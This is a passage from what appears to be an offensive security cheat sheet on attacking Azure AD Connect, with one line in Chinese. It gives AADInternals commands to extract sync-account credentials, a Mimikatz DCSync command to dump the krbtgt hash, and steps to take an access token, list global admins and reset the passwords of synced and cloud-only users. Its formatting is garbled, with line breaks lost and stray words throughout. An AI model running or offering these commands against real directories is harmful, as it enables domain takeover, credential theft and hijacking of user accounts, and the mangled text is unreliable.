# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals moduleGet-AADIntSyncCredentials# Using the creds of MSOL_* account, you can run DCSync against the on-prem ADrunas /netonly /user:defeng.corp\MSOL_123123123123 cmdInvoke-Mimikatz-Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
# This command, run previously, will give us alse the creds of this accountGet-AADIntSyncCredentials# Get access token for Sync_* account$passwd =ConvertTo-SecureString'<password>'-AsPlainText - Force$creds =New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)Get-AADIntAccessTokenForAADGraph-Credentials $creds - SaveToCache# Get global adminsGet-AADIntGlobalAdmins# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)Get-AADIntUser-UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId# Reset the users passwordSet-AADIntUserPassword-SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9="-Password "JustAPass12343.%"-Verbose# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)
也可以仅修改云用户的密码(即使这出乎意料)
# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID# The CloudAnchor is of the format USER_ObjectID.Get-AADIntUsers|?{$_.DirSyncEnabled-ne"True"} | select UserPrincipalName,ObjectID# Reset passwordSet-AADIntUserPassword-CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37"-Password "JustAPass12343.%"-Verbosewers